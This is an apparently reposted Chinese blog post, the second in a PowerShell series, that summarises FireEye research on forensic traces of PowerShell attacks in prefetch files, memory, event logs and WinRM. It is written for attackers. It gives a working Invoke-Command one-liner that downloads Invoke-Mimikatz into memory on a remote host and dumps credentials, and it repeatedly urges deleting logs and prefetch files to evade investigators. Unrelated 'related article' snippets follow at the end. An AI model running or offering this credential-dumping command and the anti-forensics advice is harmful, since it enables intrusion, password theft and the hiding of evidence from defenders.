powershell各种反弹姿势以及取证(二)

访客5年前黑客工具733

  继续《powershell各种反弹姿势以及取证(一)》,这篇主要是取证的,如果我以后技术好了,也会写写powershell在内网渗透中的实战应用,本文所有的内容基本翻译自fireEyE的,我英文不好,有好多地方都看不懂他文章里写的,我磕磕碰碰的看完了这篇文章。有不对的地方,还请小伙伴们补充。

  我们都知道,从和开始,就已经默认安装了powershell(2.0版本),到了 和 就是了。现在用powershell编写的攻击框架也很成熟了,像上文书说的各种协议反弹的SHELL(nishang);通过技术不写硬盘的,能远程dump登录账号明文的;以及在安全会议上演示的;还有各种搞windows域内网环境的powerview等;也开始支持powershell版的payloads。我们作为攻击者,也要熟悉现在针对powershell的取证技术,预防自己“艰难进来,轻松被T,却没带走一片云彩”。

  98f58PIC9ZT_1024

  原文文章分别从注册表,prefetch, *** 流量,内存,日志,自启动这几方面来做取证的。

  默认情况下,除了WinServer 2012R2 会设置项为RemoteSigned外,其他的windows系统都会设置为Restricted,有的攻击者为了运行powershell脚本方便,会设置此项为ByPass,但是这种情况并不多见,因为更多的情况是,攻击者使用-ExecuteionPolicy Bypass选项绕过执行策略限制。

  Prefetch本意是为了增强系统的性能的,让应用程序下次载入的时候,节省时间。默认路径在。取证人员常常会通过这些*.PF文件,获取程序最后运行时间,程序访问的文件列表等信息。

  取证人员有可能通过查看POWERSHELL.EXE-59FC8F3D.pf获取到你运行的攻击PS脚本信息。我这里用的Prefetch Parser v1.4来查看的,

  如图

  Powershell_1

  所以每次我们用完powershell,记得

  攻击者做内网渗透时,思路通常是先获取了工作组的administrator权限,然后渗透配置不严格的域环境,开启powershell的remoting功能,powershell 2.0的Remoting默认会走和端口,文章里说,主要是监控内网内网,DMZ内网,VPN内网的异常数据流,建模识别出攻击者的非法访问,我想这里能做的,还是要熟悉内网环境,在有正常业务流的内网使用Remoting功能,其他办法我也没想到。

  论文作者主要是说可以用框架分析进程,能够在内存空间看到XML格式的信息。比如这里他使用远程交互式SHELL执行了然后就可以在的进程里看到信息,如图:

  Powershell_2

  但是这个 *** 随着远程会话的中止,也将不再有用,要想成功实现取证,需要攻击者正在操作。所以我感觉这个对我们的威胁不是很大。如果开启了winrm,也有可能在的进程里看到信息。他这里用的是做的演示,远程通过下载在内存里执行,DUMP明文密码,不写硬盘,这个渗透技巧实战的时候很有用,命令如下:

  Invoke-Command -Computername 192.168.114.133 {iex((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')); Invoke-Mimikatz -DumpCreds}

  如下是他在svchost.exe进程内存里抓到的信息

  Powershell_3

  Powershell 2.0的默认日志功能还不是很强,powershell 3.0后有所增强,不论是你本地还是通过Remoting执行powershell脚本,都会在下面3个文件里写入日志

  windows powershell.evtx

  每次powershell开始执行或者结束的时候,都会记录。里面的HostName项如果是说明是从本地执行的,反之,是对方的机器名

  Microsoft-Windows-PowerShell%4Operational.evtx

  [我机器上没有找到这个文件]

  如果通过WINRM开启了remoting功能,还会有下面2个日志:

  Microsoft-Windows-WinRM%4Operational.evtx

  EID 6会记录remoting的客户端地址信息,在这里可能看到是谁连过来的

  Microsoft-Windows-WinRM%4Analytic.etl

  会记录客户端连接过来使用的账号信息 里面有可能会看到当执行命令的时候的细节,如图

  Powershell_4

  另外随着Microsoft APPLocker的引用,管理员能够对powershell脚本进行更进一步的验证,比如允许哪个PS脚本运行,哪个不允许,甚至禁止掉计算机上全部PS脚本的执行权限等操作,但是这些对我们来说都有已知的技术能绕过,我下回书再说。功能启用后, 和会记录认证信息的日志。

  作者也提到可以通过设置全局的profile,来增加额外的日志记录,他这里说可以用-NoProfile来绕过,上文书我实践过,发现是不可以的,参考上文,这里不多提了。

  Powershell 3.0引入了的能力,可以通过组策略开启,开启后,可以在EID 4103里看到ps脚本执行后的结果,比如我执行

  1

  意思是搜索下所有TXT里包含password的文件,可以在里看到返回结果,如图

  Powershell_5

  甚至Invoke-Mimikatz执行的结果也会记录,如图

  Powershell_6

  再次提醒我们,该删日志,一定要删,外面应该有能删指定日志的工具了,不过我没见到,有的发我一份。

  Powershell经常通过注册表,开始菜单,或者计划任务来实现自启动的目的,通常用sysinternals的autorun就能找到了。另外可以达到和一样的效果。

  https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf

  https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf

  Powershell系列其他文章:

  Powershell tricks::Bypass AV

  Powershell tricks#Powershell Remoting

  Powershell and Windows RAW SOCKET

  Powershell基础认证钓鱼与捕获

  powershell各种反弹姿势以及取证(一)

  【原文:powershell各种反弹姿势以及取证(二) 作者:Mickey 安全脉搏SP小编整理发布】

相关文章

为推动构建更加紧密的庄晶晶命运共同体注入强大动力

  综合消息:为推动构建更加紧密的命运共同体注入强大动力——多国人士高度评价习近平主席在上合组织成员国元首理事会第二十次会议上的重要讲话   新华社北京11月10日电 综合新华社驻外记者报道:上海合...

直到今天,终于明白了,台积电为什么要听美国的安排?

直到今天,终于明白了,台积电为什么要听美国的安排?

  华为,让美国都颤抖的一家中国公司!这些年,华为在5G技术和华为手机领域取得了不俗的战绩。 但现在华为面临一个难题,那就是华为麒麟芯片一直是由台积电代工,而台积电背后又是美国资本,其创始人张...

电容起什么作用(电容在电路中有什么作用)

电容器起什么作用(电容器在电源电路中有什么作用)说白了电容器,便是容下和释放出来正电荷的电子元件。电容器的基础原理便是电池充电充放电,自然也有整流器、震荡及其其他的功效。此外电容器的构造比较简单,关键...

关于黑客vs马爷视频的信息

关于黑客vs马爷视频的信息

本文目录一览: 1、黑客与电脑白痴对话的全文 2、推荐一些好电影我寒假看那! 3、《黑客帝国》是袁和平导的吗,和他有关吗? 4、黑客帝国2里面的一些问题……求解答 尼欧见到那个白头发老头后...

找黑客盗取YY号(黑客盗取qq密码教程)

朋友你好!对于这种搞破坏的人,确实很讨厌!一般很难有人能够做到盗取指定号码,那样就必须入侵TX数据库;现在很多的都是通过其他方法盗取,例如。 QQ被盗了,只要在登陆处点击那个忘记密码。会出现申诉的一个...

有推广奖励的项目点评第一期!

关注我博客的,大部分都是单干党,固然另有不少人有自己团队和人脉,究竟单打独斗的收益极其有限,以是他们看哪些项目推广收益高,就会推广哪个。我做的项目太多,有人咨询推哪个收益高时,一时也找不到分享哪个好,...